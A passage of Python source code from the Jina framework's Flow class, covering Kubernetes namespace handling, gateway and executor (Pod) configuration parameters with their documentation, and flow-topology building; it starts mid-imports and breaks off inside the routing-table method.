from ..peapods.pods.factory import PodFactory
from ..types.routing.table import RoutingTable
from ..peapods.networking import is_remote_local_connection
__all__ = ['Flow']
class FlowType(type(ExitStack), type(JAMLCompatible)):
"""Type of Flow, metaclass of :class:`BaseFlow`"""
pass
_regex_port = r'(.*?):([0-9]{1,4}|[1-5][0-9]{4}|6[0-4][0-9]{3}|65[0-4][0-9]{2}|655[0-2][0-9]|6553[0-5])$'
if False:
from ..executors import BaseExecutor
from ..clients.base import BaseClient
from .asyncio import AsyncFlow
GATEWAY_NAME = 'gateway'
FALLBACK_PARSERS = [
set_gateway_parser(),
set_pod_parser(),
set_client_cli_parser(),
set_flow_parser(),
]
class Flow(PostMixin, JAMLCompatible, ExitStack, metaclass=FlowType):
"""Flow is how Jina streamlines and distributes Executors. """
class _FlowK8sInfraResourcesManager:
def __init__(self, k8s_namespace: str, k8s_custom_resource_dir: Optional[str]):
self.k8s_namespace = k8s_namespace
self.k8s_custom_resource_dir = k8s_custom_resource_dir
self.namespace_created = False
def __enter__(self):
from ..peapods.pods.k8slib import kubernetes_tools, kubernetes_client
client = kubernetes_client.K8sClients().core_v1
list_namespaces = [
item.metadata.name for item in client.list_namespace().items
]
if self.k8s_namespace not in list_namespaces:
with JinaLogger(f'create_{self.k8s_namespace}') as logger:
logger.info(f'🏝️\tCreate Namespace "{self.k8s_namespace}"')
kubernetes_tools.create(
'namespace',
{'name': self.k8s_namespace},
logger=logger,
custom_resource_dir=self.k8s_custom_resource_dir,
)
self.namespace_created = True
def __exit__(self, exc_type, exc_val, exc_tb):
from ..peapods.pods.k8slib import kubernetes_client
if self.namespace_created:
client = kubernetes_client.K8sClients().core_v1
client.delete_namespace(name=self.k8s_namespace)
# overload_inject_start_client_flow
@overload
def __init__(
self,
*,
asyncio: Optional[bool] = False,
host: Optional[str] = '0.0.0.0',
https: Optional[bool] = False,
port: Optional[int] = None,
protocol: Optional[str] = 'GRPC',
proxy: Optional[bool] = False,
**kwargs,
):
"""Create a Flow. Flow is how Jina streamlines and scales Executors. This overloaded method provides arguments from `jina client` CLI.
:param asyncio: If set, then the input and output of this Client work in an asynchronous manner.
:param host: The host address of the runtime, by default it is 0.0.0.0.
:param https: If set, connect to gateway using https
:param port: The port of the Gateway, which the client should connect to.
:param protocol: Communication protocol between server and client.
:param proxy: If set, respect the http_proxy and https_proxy environment variables. otherwise, it will unset these proxy variables before start. gRPC seems to prefer no proxy
.. # noqa: DAR202
.. # noqa: DAR101
.. # noqa: DAR003
"""
# overload_inject_end_client_flow
# overload_inject_start_gateway_flow
@overload
def __init__(
self,
*,
compress: Optional[str] = 'NONE',
compress_min_bytes: Optional[int] = 1024,
compress_min_ratio: Optional[float] = 1.1,
cors: Optional[bool] = False,
ctrl_with_ipc: Optional[bool] = True,
daemon: Optional[bool] = False,
default_swagger_ui: Optional[bool] = False,
description: Optional[str] = None,
env: Optional[dict] = None,
expose_endpoints: Optional[str] = None,
expose_public: Optional[bool] = False,
host: Optional[str] = '0.0.0.0',
host_in: Optional[str] = '0.0.0.0',
host_out: Optional[str] = '0.0.0.0',
hosts_in_connect: Optional[List[str]] = None,
log_config: Optional[str] = None,
memory_hwm: Optional[int] = -1,
name: Optional[str] = 'gateway',
native: Optional[bool] = False,
no_crud_endpoints: Optional[bool] = False,
no_debug_endpoints: Optional[bool] = False,
on_error_strategy: Optional[str] = 'IGNORE',
port_ctrl: Optional[int] = None,
port_expose: Optional[int] = None,
port_in: Optional[int] = None,
port_out: Optional[int] = None,
prefetch: Optional[int] = 0,
protocol: Optional[str] = 'GRPC',
proxy: Optional[bool] = False,
py_modules: Optional[List[str]] = None,
quiet: Optional[bool] = False,
quiet_error: Optional[bool] = False,
replicas: Optional[int] = 1,
runs_in_docker: Optional[bool] = False,
runtime_backend: Optional[str] = 'PROCESS',
runtime_cls: Optional[str] = 'GRPCRuntime',
shards: Optional[int] = 1,
socket_in: Optional[str] = 'PULL_CONNECT',
socket_out: Optional[str] = 'PUSH_CONNECT',
ssh_keyfile: Optional[str] = None,
ssh_password: Optional[str] = None,
ssh_server: Optional[str] = None,
static_routing_table: Optional[bool] = False,
timeout_ctrl: Optional[int] = 5000,
timeout_ready: Optional[int] = 600000,
title: Optional[str] = None,
uses: Optional[Union[str, Type['BaseExecutor'], dict]] = 'BaseExecutor',
uses_metas: Optional[dict] = None,
uses_requests: Optional[dict] = None,
uses_with: Optional[dict] = None,
uvicorn_kwargs: Optional[dict] = None,
workspace: Optional[str] = None,
zmq_identity: Optional[str] = None,
**kwargs,
):
"""Create a Flow. Flow is how Jina streamlines and scales Executors. This overloaded method provides arguments from `jina gateway` CLI.
:param compress: The compress algorithm used over the entire Flow.
Note that this is not necessarily effective,
it depends on the settings of `--compress-min-bytes` and `compress-min-ratio`
:param compress_min_bytes: The original message size must be larger than this number to trigger the compress algorithm, -1 means disable compression.
:param compress_min_ratio: The compression ratio (uncompressed_size/compressed_size) must be higher than this number to trigger the compress algorithm.
:param cors: If set, a CORS middleware is added to FastAPI frontend to allow cross-origin access.
:param ctrl_with_ipc: If set, use ipc protocol for control socket
:param daemon: The Pea attempts to terminate all of its Runtime child processes/threads on existing. setting it to true basically tell the Pea do not wait on the Runtime when closing
:param default_swagger_ui: If set, the default swagger ui is used for `/docs` endpoint.
:param description: The description of this HTTP server. It will be used in automatics docs such as Swagger UI.
:param env: The map of environment variables that are available inside runtime
:param expose_endpoints: A JSON string that represents a map from executor endpoints (`@requests(on=...)`) to HTTP endpoints.
:param expose_public: If set, expose the public IP address to remote when necessary, by default it exposesprivate IP address, which only allows accessing under the same network/subnet. Important to set this to true when the Pea will receive input connections from remote Peas
:param host: The host address of the runtime, by default it is 0.0.0.0.
:param host_in: The host address for input, by default it is 0.0.0.0
:param host_out: The host address for output, by default it is 0.0.0.0
:param hosts_in_connect: The host address for input, by default it is 0.0.0.0
:param log_config: The YAML config of the logger used in this object.
:param memory_hwm: The memory high watermark of this pod in Gigabytes, pod will restart when this is reached. -1 means no restriction
:param name: The name of this object.
This will be used in the following places:
- how you refer to this object in Python/YAML/CLI
- visualization
- log message header
- ...
When not given, then the default naming strategy will apply.
:param native: If set, only native Executors is allowed, and the Executor is always run inside ZEDRuntime.
:param no_crud_endpoints: If set, /index, /search, /update, /delete endpoints are removed from HTTP interface.
Any executor that has `@requests(on=...)` bind with those values will receive data requests.
:param no_debug_endpoints: If set, /status /post endpoints are removed from HTTP interface.
:param on_error_strategy: The skip strategy on exceptions.
- IGNORE: Ignore it, keep running all Executors in the sequel flow
- SKIP_HANDLE: Skip all Executors in the sequel, only `pre_hook` and `post_hook` are called
- THROW_EARLY: Immediately throw the exception, the sequel flow will not be running at all
Note, `IGNORE`, `SKIP_EXECUTOR` and `SKIP_HANDLE` do not guarantee the success execution in the sequel flow. If something
is wrong in the upstream, it is hard to carry this exception and moving forward without any side-effect.
:param port_ctrl: The port for controlling the runtime, default a random port between [49152, 65535]
:param port_expose: The port that the gateway exposes for clients for GRPC connections.
:param port_in: The port for input data, default a random port between [49152, 65535]
:param port_out: The port for output data, default a random port between [49152, 65535]
:param prefetch: Number of requests fetched from the client before feeding into the first Executor.
Used to control the speed of data input into a Flow. 0 disables prefetch (disabled by default)
:param protocol: Communication protocol between server and client.
:param proxy: If set, respect the http_proxy and https_proxy environment variables. otherwise, it will unset these proxy variables before start. gRPC seems to prefer no proxy
:param py_modules: The customized python modules need to be imported before loading the executor
Note that the recommended way is to only import a single module - a simple python file, if your
executor can be defined in a single file, or an ``__init__.py`` file if you have multiple files,
which should be structured as a python package. For more details, please see the
`Executor cookbook <https://docs.jina.ai/fundamentals/executor/repository-structure/>`__
:param quiet: If set, then no log will be emitted from this object.
:param quiet_error: If set, then exception stack information will not be added to the log
:param replicas: The number of replicas in the pod, `port_in` and `port_out` will be set to random, and routers will be added automatically when necessary
:param runs_in_docker: Informs a Pea that runs in a container. Important to properly set networking information
:param runtime_backend: The parallel backend of the runtime inside the Pea
:param runtime_cls: The runtime class to run inside the Pea
:param shards: The number of shards in the pod running at the same time, `port_in` and `port_out` will be set to random, and routers will be added automatically when necessary
:param socket_in: The socket type for input port
:param socket_out: The socket type for output port
:param ssh_keyfile: This specifies a key to be used in ssh login, default None. regular default ssh keys will be used without specifying this argument.
:param ssh_password: The ssh password to the ssh server.
:param ssh_server: The SSH server through which the tunnel will be created, can actually be a fully specified `user@server:port` ssh url.
:param static_routing_table: Defines if the routing table should be pre computed by the Flow. In this case it is statically defined for each Pod and not send on every data request. Can not be used in combination with external pods
:param timeout_ctrl: The timeout in milliseconds of the control request, -1 for waiting forever
:param timeout_ready: The timeout in milliseconds of a Pea waits for the runtime to be ready, -1 for waiting forever
:param title: The title of this HTTP server. It will be used in automatics docs such as Swagger UI.
:param uses: The config of the executor, it could be one of the followings:
* an Executor YAML file (.yml, .yaml, .jaml)
* a Jina Hub Executor (must start with `jinahub://` or `jinahub+docker://`)
* a docker image (must start with `docker://`)
* the string literal of a YAML config (must start with `!` or `jtype: `)
* the string literal of a JSON config
When use it under Python, one can use the following values additionally:
- a Python dict that represents the config
- a text file stream has `.read()` interface
:param uses_metas: Dictionary of keyword arguments that will override the `metas` configuration in `uses`
:param uses_requests: Dictionary of keyword arguments that will override the `requests` configuration in `uses`
:param uses_with: Dictionary of keyword arguments that will override the `with` configuration in `uses`
:param uvicorn_kwargs: Dictionary of kwargs arguments that will be passed to Uvicorn server when starting the server
More details can be found in Uvicorn docs: https://www.uvicorn.org/settings/
:param workspace: The working directory for any IO operations in this object. If not set, then derive from its parent `workspace`.
:param zmq_identity: The identity of a ZMQRuntime. It is used for unique socket identification towards other ZMQRuntimes.
.. # noqa: DAR202
.. # noqa: DAR101
.. # noqa: DAR003
"""
# overload_inject_end_gateway_flow
# overload_inject_start_flow
@overload
def __init__(
self,
*,
env: Optional[dict] = None,
inspect: Optional[str] = 'COLLECT',
log_config: Optional[str] = None,
name: Optional[str] = None,
quiet: Optional[bool] = False,
quiet_error: Optional[bool] = False,
static_routing_table: Optional[bool] = False,
uses: Optional[str] = None,
workspace: Optional[str] = './',
**kwargs,
):
"""Create a Flow. Flow is how Jina streamlines and scales Executors. This overloaded method provides arguments from `jina flow` CLI.
:param env: The map of environment variables that are available inside runtime
:param inspect: The strategy on those inspect pods in the flow.
If `REMOVE` is given then all inspect pods are removed when building the flow.
:param log_config: The YAML config of the logger used in this object.
:param name: The name of this object.
This will be used in the following places:
- how you refer to this object in Python/YAML/CLI
- visualization
- log message header
- ...
When not given, then the default naming strategy will apply.
:param quiet: If set, then no log will be emitted from this object.
:param quiet_error: If set, then exception stack information will not be added to the log
:param static_routing_table: Defines if the routing table should be pre computed by the Flow. In this case it is statically defined for each Pod and not send on every data request. Can not be used in combination with external pods
:param uses: The YAML file represents a flow
:param workspace: The working directory for any IO operations in this object. If not set, then derive from its parent `workspace`.
.. # noqa: DAR202
.. # noqa: DAR101
.. # noqa: DAR003
"""
# overload_inject_end_flow
def __init__(
self,
args: Optional['argparse.Namespace'] = None,
**kwargs,
):
super().__init__()
self._version = '1' #: YAML version number, this will be later overridden if YAML config says the other way
self._pod_nodes = OrderedDict() # type: Dict[str, Pod]
self._inspect_pods = {} # type: Dict[str, str]
self._endpoints_mapping = {} # type: Dict[str, Dict]
self._build_level = FlowBuildLevel.EMPTY
self._last_changed_pod = [
GATEWAY_NAME
] #: default first pod is gateway, will add when build()
self._update_args(args, **kwargs)
self.k8s_infrastructure_manager = None
if self.args.infrastructure == InfrastructureType.K8S:
self.k8s_infrastructure_manager = self._FlowK8sInfraResourcesManager(
k8s_namespace=self.args.name,
k8s_custom_resource_dir=getattr(
self.args, 'k8s_custom_resource_dir', None
),
)
if isinstance(self.args, argparse.Namespace):
self.logger = JinaLogger(
self.__class__.__name__, **vars(self.args), **self._common_kwargs
)
else:
self.logger = JinaLogger(self.__class__.__name__, **self._common_kwargs)
def _update_args(self, args, **kwargs):
from ..parsers.flow import set_flow_parser
from ..helper import ArgNamespace
_flow_parser = set_flow_parser()
if args is None:
args = ArgNamespace.kwargs2namespace(
kwargs, _flow_parser, True, fallback_parsers=FALLBACK_PARSERS
)
self.args = args
# common args should be the ones that can not be parsed by _flow_parser
known_keys = vars(args)
self._common_kwargs = {k: v for k, v in kwargs.items() if k not in known_keys}
self._kwargs = ArgNamespace.get_non_defaults_args(
args, _flow_parser
) #: for yaml dump
if self._common_kwargs.get('asyncio', False) and not isinstance(
self, AsyncPostMixin
):
from .asyncio import AsyncFlow
self.__class__ = AsyncFlow
@staticmethod
def _parse_endpoints(op_flow, pod_name, endpoint, connect_to_last_pod=False) -> Set:
# parsing needs
if isinstance(endpoint, str):
endpoint = [endpoint]
elif not endpoint:
if op_flow._last_changed_pod and connect_to_last_pod:
endpoint = [op_flow.last_pod]
else:
endpoint = []
if isinstance(endpoint, (list, tuple)):
for idx, s in enumerate(endpoint):
if s == pod_name:
raise FlowTopologyError(
'the income/output of a pod can not be itself'
)
else:
raise ValueError(f'endpoint={endpoint} is not parsable')
# if an endpoint is being inspected, then replace it with inspected Pod
endpoint = set(op_flow._inspect_pods.get(ep, ep) for ep in endpoint)
return endpoint
@property
def last_pod(self):
"""Last pod
.. # noqa: DAR401
.. # noqa: DAR201
"""
return self._last_changed_pod[-1]
@last_pod.setter
def last_pod(self, name: str):
"""
Set a Pod as the last Pod in the Flow, useful when modifying the Flow.
.. # noqa: DAR401
:param name: the name of the existing Pod
"""
if name not in self._pod_nodes:
raise FlowMissingPodError(f'{name} can not be found in this Flow')
if self._last_changed_pod and name == self.last_pod:
pass
else:
self._last_changed_pod.append(name)
# graph is now changed so we need to
# reset the build level to the lowest
self._build_level = FlowBuildLevel.EMPTY
@allowed_levels([FlowBuildLevel.EMPTY])
def _add_gateway(self, needs, **kwargs):
kwargs.update(
dict(
name=GATEWAY_NAME,
ctrl_with_ipc=True, # otherwise ctrl port would be conflicted
host=self.host,
protocol=self.protocol,
port_expose=self.port_expose,
pod_role=PodRoleType.GATEWAY,
expose_endpoints=json.dumps(self._endpoints_mapping),
k8s_namespace=self.args.name,
)
)
kwargs.update(self._common_kwargs)
args = ArgNamespace.kwargs2namespace(kwargs, set_gateway_parser())
args.k8s_namespace = self.args.name
args.connect_to_predecessor = False
args.noblock_on_start = True
self._pod_nodes[GATEWAY_NAME] = PodFactory.build_pod(
args, needs, self.args.infrastructure
)
@allowed_levels([FlowBuildLevel.EMPTY])
def needs(
self, needs: Union[Tuple[str], List[str]], name: str = 'joiner', *args, **kwargs
) -> 'Flow':
"""
Add a blocker to the Flow, wait until all peas defined in **needs** completed.
.. # noqa: DAR401
:param needs: list of service names to wait
:param name: the name of this joiner, by default is ``joiner``
:param args: additional positional arguments forwarded to the add function
:param kwargs: additional key value arguments forwarded to the add function
:return: the modified Flow
"""
if len(needs) <= 1:
raise FlowTopologyError(
'no need to wait for a single service, need len(needs) > 1'
)
return self.add(
name=name, needs=needs, pod_role=PodRoleType.JOIN, *args, **kwargs
)
def needs_all(self, name: str = 'joiner', *args, **kwargs) -> 'Flow':
"""
Collect all hanging Pods so far and add a blocker to the Flow; wait until all handing peas completed.
:param name: the name of this joiner (default is ``joiner``)
:param args: additional positional arguments which are forwarded to the add and needs function
:param kwargs: additional key value arguments which are forwarded to the add and needs function
:return: the modified Flow
"""
needs = _hanging_pods(self)
if len(needs) == 1:
return self.add(name=name, needs=needs, *args, **kwargs)
return self.needs(name=name, needs=needs, *args, **kwargs)
# overload_inject_start_pod
@overload
def add(
self,
*,
connect_to_predecessor: Optional[bool] = False,
ctrl_with_ipc: Optional[bool] = False,
daemon: Optional[bool] = False,
docker_kwargs: Optional[dict] = None,
entrypoint: Optional[str] = None,
env: Optional[dict] = None,
expose_public: Optional[bool] = False,
external: Optional[bool] = False,
force: Optional[bool] = False,
gpus: Optional[str] = None,
host: Optional[str] = '0.0.0.0',
host_in: Optional[str] = '0.0.0.0',
host_out: Optional[str] = '0.0.0.0',
hosts_in_connect: Optional[List[str]] = None,
install_requirements: Optional[bool] = False,
log_config: Optional[str] = None,
memory_hwm: Optional[int] = -1,
name: Optional[str] = None,
native: Optional[bool] = False,
on_error_strategy: Optional[str] = 'IGNORE',
peas_hosts: Optional[List[str]] = None,
polling: Optional[str] = 'ANY',
port_ctrl: Optional[int] = None,
port_in: Optional[int] = None,
port_jinad: Optional[int] = 8000,
port_out: Optional[int] = None,
pull_latest: Optional[bool] = False,
py_modules: Optional[List[str]] = None,
quiet: Optional[bool] = False,
quiet_error: Optional[bool] = False,
quiet_remote_logs: Optional[bool] = False,
replicas: Optional[int] = 1,
runs_in_docker: Optional[bool] = False,
runtime_backend: Optional[str] = 'PROCESS',
runtime_cls: Optional[str] = 'ZEDRuntime',
scheduling: Optional[str] = 'LOAD_BALANCE',
shards: Optional[int] = 1,
socket_in: Optional[str] = 'PULL_BIND',
socket_out: Optional[str] = 'PUSH_BIND',
ssh_keyfile: Optional[str] = None,
ssh_password: Optional[str] = None,
ssh_server: Optional[str] = None,
static_routing_table: Optional[bool] = False,
timeout_ctrl: Optional[int] = 5000,
timeout_ready: Optional[int] = 600000,
upload_files: Optional[List[str]] = None,
uses: Optional[Union[str, Type['BaseExecutor'], dict]] = 'BaseExecutor',
uses_after: Optional[Union[str, Type['BaseExecutor'], dict]] = None,
uses_before: Optional[Union[str, Type['BaseExecutor'], dict]] = None,
uses_metas: Optional[dict] = None,
uses_requests: Optional[dict] = None,
uses_with: Optional[dict] = None,
volumes: Optional[List[str]] = None,
workspace: Optional[str] = None,
zmq_identity: Optional[str] = None,
**kwargs,
) -> Union['Flow', 'AsyncFlow']:
"""Add an Executor to the current Flow object.
:param connect_to_predecessor: The head Pea of this Pod will connect to the TailPea of the predecessor Pod.
:param ctrl_with_ipc: If set, use ipc protocol for control socket
:param daemon: The Pea attempts to terminate all of its Runtime child processes/threads on existing. setting it to true basically tell the Pea do not wait on the Runtime when closing
:param docker_kwargs: Dictionary of kwargs arguments that will be passed to Docker SDK when starting the docker '
container.
More details can be found in the Docker SDK docs: https://docker-py.readthedocs.io/en/stable/
:param entrypoint: The entrypoint command overrides the ENTRYPOINT in Docker image. when not set then the Docker image ENTRYPOINT takes effective.
:param env: The map of environment variables that are available inside runtime
:param expose_public: If set, expose the public IP address to remote when necessary, by default it exposesprivate IP address, which only allows accessing under the same network/subnet. Important to set this to true when the Pea will receive input connections from remote Peas
:param external: The Pod will be considered an external Pod that has been started independently from the Flow.This Pod will not be context managed by the Flow.
:param force: If set, always pull the latest Hub Executor bundle even it exists on local
:param gpus: This argument allows dockerized Jina executor discover local gpu devices.
Note,
- To access all gpus, use `--gpus all`.
- To access multiple gpus, e.g. make use of 2 gpus, use `--gpus 2`.
- To access specified gpus based on device id, use `--gpus device=[YOUR-GPU-DEVICE-ID]`
- To access specified gpus based on multiple device id, use `--gpus device=[YOUR-GPU-DEVICE-ID1],device=[YOUR-GPU-DEVICE-ID2]`
- To specify more parameters, use `--gpus device=[YOUR-GPU-DEVICE-ID],runtime=nvidia,capabilities=display
:param host: The host address of the runtime, by default it is 0.0.0.0.
:param host_in: The host address for input, by default it is 0.0.0.0
:param host_out: The host address for output, by default it is 0.0.0.0
:param hosts_in_connect: The host address for input, by default it is 0.0.0.0
:param install_requirements: If set, install `requirements.txt` in the Hub Executor bundle to local
:param log_config: The YAML config of the logger used in this object.
:param memory_hwm: The memory high watermark of this pod in Gigabytes, pod will restart when this is reached. -1 means no restriction
:param name: The name of this object.
This will be used in the following places:
- how you refer to this object in Python/YAML/CLI
- visualization
- log message header
- ...
When not given, then the default naming strategy will apply.
:param native: If set, only native Executors is allowed, and the Executor is always run inside ZEDRuntime.
:param on_error_strategy: The skip strategy on exceptions.
- IGNORE: Ignore it, keep running all Executors in the sequel flow
- SKIP_HANDLE: Skip all Executors in the sequel, only `pre_hook` and `post_hook` are called
- THROW_EARLY: Immediately throw the exception, the sequel flow will not be running at all
Note, `IGNORE`, `SKIP_EXECUTOR` and `SKIP_HANDLE` do not guarantee the success execution in the sequel flow. If something
is wrong in the upstream, it is hard to carry this exception and moving forward without any side-effect.
:param peas_hosts: The hosts of the peas when shards greater than 1.
Peas will be evenly distributed among the hosts. By default,
peas are running on host provided by the argument ``host``
:param polling: The polling strategy of the Pod (when `shards>1`)
- ANY: only one (whoever is idle) Pea polls the message
- ALL: all Peas poll the message (like a broadcast)
:param port_ctrl: The port for controlling the runtime, default a random port between [49152, 65535]
:param port_in: The port for input data, default a random port between [49152, 65535]
:param port_jinad: The port of the remote machine for usage with JinaD.
:param port_out: The port for output data, default a random port between [49152, 65535]
:param pull_latest: Pull the latest image before running
:param py_modules: The customized python modules need to be imported before loading the executor
Note that the recommended way is to only import a single module - a simple python file, if your
executor can be defined in a single file, or an ``__init__.py`` file if you have multiple files,
which should be structured as a python package. For more details, please see the
`Executor cookbook <https://docs.jina.ai/fundamentals/executor/repository-structure/>`__
:param quiet: If set, then no log will be emitted from this object.
:param quiet_error: If set, then exception stack information will not be added to the log
:param quiet_remote_logs: Do not display the streaming of remote logs on local console
:param replicas: The number of replicas in the pod, `port_in` and `port_out` will be set to random, and routers will be added automatically when necessary
:param runs_in_docker: Informs a Pea that runs in a container. Important to properly set networking information
:param runtime_backend: The parallel backend of the runtime inside the Pea
:param runtime_cls: The runtime class to run inside the Pea
:param scheduling: The strategy of scheduling workload among Peas
:param shards: The number of shards in the pod running at the same time, `port_in` and `port_out` will be set to random, and routers will be added automatically when necessary
:param socket_in: The socket type for input port
:param socket_out: The socket type for output port
:param ssh_keyfile: This specifies a key to be used in ssh login, default None. regular default ssh keys will be used without specifying this argument.
:param ssh_password: The ssh password to the ssh server.
:param ssh_server: The SSH server through which the tunnel will be created, can actually be a fully specified `user@server:port` ssh url.
:param static_routing_table: Defines if the routing table should be pre computed by the Flow. In this case it is statically defined for each Pod and not send on every data request. Can not be used in combination with external pods
:param timeout_ctrl: The timeout in milliseconds of the control request, -1 for waiting forever
:param timeout_ready: The timeout in milliseconds of a Pea waits for the runtime to be ready, -1 for waiting forever
:param upload_files: The files on the host to be uploaded to the remote
workspace. This can be useful when your Pod has more
file dependencies beyond a single YAML file, e.g.
Python files, data files.
Note,
- currently only flatten structure is supported, which means if you upload `[./foo/a.py, ./foo/b.pp, ./bar/c.yml]`, then they will be put under the _same_ workspace on the remote, losing all hierarchies.
- by default, `--uses` YAML file is always uploaded.
- uploaded files are by default isolated across the runs. To ensure files are submitted to the same workspace across different runs, use `--workspace-id` to specify the workspace.
:param uses: The config of the executor, it could be one of the followings:
* an Executor YAML file (.yml, .yaml, .jaml)
* a Jina Hub Executor (must start with `jinahub://` or `jinahub+docker://`)
* a docker image (must start with `docker://`)
* the string literal of a YAML config (must start with `!` or `jtype: `)
* the string literal of a JSON config
When use it under Python, one can use the following values additionally:
- a Python dict that represents the config
- a text file stream has `.read()` interface
:param uses_after: The executor attached after the Peas described by --uses, typically used for receiving from all shards, accepted type follows `--uses`
:param uses_before: The executor attached after the Peas described by --uses, typically before sending to all shards, accepted type follows `--uses`
:param uses_metas: Dictionary of keyword arguments that will override the `metas` configuration in `uses`
:param uses_requests: Dictionary of keyword arguments that will override the `requests` configuration in `uses`
:param uses_with: Dictionary of keyword arguments that will override the `with` configuration in `uses`
:param volumes: The path on the host to be mounted inside the container.
Note,
- If separated by `:`, then the first part will be considered as the local host path and the second part is the path in the container system.
- If no split provided, then the basename of that directory will be mounted into container's root path, e.g. `--volumes="/user/test/my-workspace"` will be mounted into `/my-workspace` inside the container.
- All volumes are mounted with read-write mode.
:param workspace: The working directory for any IO operations in this object. If not set, then derive from its parent `workspace`.
:param zmq_identity: The identity of a ZMQRuntime. It is used for unique socket identification towards other ZMQRuntimes.
:return: a (new) Flow object with modification
.. # noqa: DAR202
.. # noqa: DAR101
.. # noqa: DAR003
"""
# overload_inject_end_pod
@allowed_levels([FlowBuildLevel.EMPTY])
def add(
self,
*,
needs: Optional[Union[str, Tuple[str], List[str]]] = None,
copy_flow: bool = True,
pod_role: 'PodRoleType' = PodRoleType.POD,
**kwargs,
) -> 'Flow':
"""
Add a Pod to the current Flow object and return the new modified Flow object.
The attribute of the Pod can be later changed with :py:meth:`set` or deleted with :py:meth:`remove`
.. # noqa: DAR401
:param needs: the name of the Pod(s) that this Pod receives data from.
One can also use 'gateway' to indicate the connection with the gateway.
:param pod_role: the role of the Pod, used for visualization and route planning
:param copy_flow: when set to true, then always copy the current Flow and do the modification on top of it then return, otherwise, do in-line modification
:param kwargs: other keyword-value arguments that the Pod CLI supports
:return: a (new) Flow object with modification
"""
op_flow = copy.deepcopy(self) if copy_flow else self
# pod naming logic
pod_name = kwargs.get('name', None)
if pod_name in op_flow._pod_nodes:
new_name = f'{pod_name}{len(op_flow._pod_nodes)}'
self.logger.debug(
f'"{pod_name}" is used in this Flow already! renamed it to "{new_name}"'
)
pod_name = new_name
if not pod_name:
pod_name = f'executor{len(op_flow._pod_nodes)}'
if not pod_name.isidentifier():
# hyphen - can not be used in the name
raise ValueError(
f'name: {pod_name} is invalid, please follow the python variable name conventions'
)
# needs logic
needs = op_flow._parse_endpoints(
op_flow, pod_name, needs, connect_to_last_pod=True
)
# set the kwargs inherit from `Flow(kwargs1=..., kwargs2=)`
for key, value in op_flow._common_kwargs.items():
if key not in kwargs:
kwargs[key] = value
# check if host is set to remote:port
if 'host' in kwargs:
m = re.match(_regex_port, kwargs['host'])
if (
kwargs.get('host', __default_host__) != __default_host__
and m
and 'port_jinad' not in kwargs
):
kwargs['port_jinad'] = m.group(2)
kwargs['host'] = m.group(1)
# update kwargs of this Pod
kwargs.update(dict(name=pod_name, pod_role=pod_role, num_part=len(needs)))
parser = set_pod_parser()
if pod_role == PodRoleType.GATEWAY:
parser = set_gateway_parser()
args = ArgNamespace.kwargs2namespace(
kwargs, parser, True, fallback_parsers=FALLBACK_PARSERS
)
# grpc data runtime does not support sharding at the moment
if (
args.grpc_data_requests
and kwargs.get('shards') is not None
and kwargs.get('shards', 1) > 1
and self.args.infrastructure != InfrastructureType.K8S
):
raise NotImplementedError("GRPC data runtime does not support sharding")
if args.grpc_data_requests and args.runtime_cls == 'ZEDRuntime':
args.runtime_cls = 'GRPCDataRuntime'
# pod workspace if not set then derive from flow workspace
args.workspace = os.path.abspath(args.workspace or self.workspace)
args.k8s_namespace = self.args.name
args.noblock_on_start = True
# BACKWARDS COMPATIBILITY:
# We assume that this is used in a search Flow if replicas and shards are used
# Thus the polling type should be all
# But dont override any user provided polling
if args.replicas > 1 and args.shards > 1 and 'polling' not in kwargs:
args.polling = PollingType.ALL
op_flow._pod_nodes[pod_name] = PodFactory.build_pod(
args, needs, self.args.infrastructure
)
op_flow.last_pod = pod_name
return op_flow
@allowed_levels([FlowBuildLevel.EMPTY])
def inspect(self, name: str = 'inspect', *args, **kwargs) -> 'Flow':
"""Add an inspection on the last changed Pod in the Flow
Internally, it adds two Pods to the Flow. But don't worry, the overhead is minimized and you
can remove them by simply using `Flow(inspect=FlowInspectType.REMOVE)` before using the Flow.
.. highlight:: bash
.. code-block:: bash
Flow -- PUB-SUB -- BasePod(_pass) -- Flow
|
-- PUB-SUB -- InspectPod (Hanging)
In this way, :class:`InspectPod` looks like a simple ``_pass`` from outside and
does not introduce side-effects (e.g. changing the socket type) to the original Flow.
The original incoming and outgoing socket types are preserved.
This function is very handy for introducing an Evaluator into the Flow.
.. seealso::
:meth:`gather_inspect`
:param name: name of the Pod
:param args: args for .add()
:param kwargs: kwargs for .add()
:return: the new instance of the Flow
"""
_last_pod = self.last_pod
op_flow = self.add(
name=name, needs=_last_pod, pod_role=PodRoleType.INSPECT, *args, **kwargs
)
# now remove uses and add an auxiliary Pod
if 'uses' in kwargs:
kwargs.pop('uses')
op_flow = op_flow.add(
name=f'_aux_{name}',
needs=_last_pod,
pod_role=PodRoleType.INSPECT_AUX_PASS,
*args,
**kwargs,
)
# register any future connection to _last_pod by the auxiliary Pod
op_flow._inspect_pods[_last_pod] = op_flow.last_pod
return op_flow
@allowed_levels([FlowBuildLevel.EMPTY])
def gather_inspect(
self,
name: str = 'gather_inspect',
include_last_pod: bool = True,
*args,
**kwargs,
) -> 'Flow':
"""Gather all inspect Pods output into one Pod. When the Flow has no inspect Pod then the Flow itself
is returned.
.. note::
If ``--no-inspect`` is **not** given, then :meth:`gather_inspect` is auto called before :meth:`build`. So
in general you don't need to manually call :meth:`gather_inspect`.
:param name: the name of the gather Pod
:param include_last_pod: if to include the last modified Pod in the Flow
:param args: args for .add()
:param kwargs: kwargs for .add()
:return: the modified Flow or the copy of it
.. seealso::
:meth:`inspect`
"""
needs = [k for k, v in self._pod_nodes.items() if v.role == PodRoleType.INSPECT]
if needs:
if include_last_pod:
needs.append(self.last_pod)
return self.add(
name=name,
needs=needs,
pod_role=PodRoleType.JOIN_INSPECT,
*args,
**kwargs,
)
else:
# no inspect node is in the graph, return the current graph
return self
def _get_gateway_target(self, prefix):
gateway_pod = self._pod_nodes[GATEWAY_NAME]
return (
f'{prefix}-{GATEWAY_NAME}',
{
'host': gateway_pod.head_host,
'port': gateway_pod.head_port_in,
'expected_parts': 0,
},
)
# TODO needs to be refactored - deployment should not be a dictionary. Related Ticket:
# https://github.com/jina-ai/jina/issues/3280
def _get_routing_table(self) -> RoutingTable:
graph = RoutingTable()
for pod_id, pod in self._pod_nodes.items():
if pod_id == GATEWAY_NAME:
deployment = pod.deployments[0]
graph.add_pod(
f'start-{GATEWAY_NAME}',
deployment['head_host'],
deployment['head_port_in'],
deployment['tail_port_out'],
deployment['head_zmq_identity'],
)
graph.add_pod(
f'end-{GATEWAY_NAME}',
deployment['head_host'],
deployment['head_port_in'],
deployment['tail_port_out'],
deployment['head_zmq_identity'],
)
else:
for deployment in pod.deployments:
graph.add_pod(
